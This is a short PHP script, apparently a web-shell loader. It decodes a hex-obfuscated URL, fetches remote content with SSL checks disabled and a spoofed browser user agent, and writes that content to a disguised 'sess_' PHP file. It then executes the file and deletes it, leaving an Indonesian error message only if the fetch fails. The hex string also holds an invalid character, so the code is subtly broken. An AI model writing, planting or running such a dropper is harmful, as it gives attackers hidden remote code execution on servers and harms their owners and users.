<?php
$h = "68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6m2f6c756666796f706d2f6f706d2f726566732f68656164732f6d61696e2f332e747874";
$u = pack("H*", $h);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");

$d = curl_exec($ch);
$e = curl_error($ch);
curl_close($ch);

if (!$d) {
    $d = @file_get_contents($u);
}

if ($d) {
    $n = "sess_" . md5(time()) . ".php";
    $c = (strpos($d, '<?php') === false) ? '<?php ' . $d : $d;
    if (@file_put_contents($n, $c)) {
        @chmod($n, 0644);
        include($n);
        @unlink($n);
    }
} else {
    echo "Koneksi diblokir server. Error: " . $e;
}
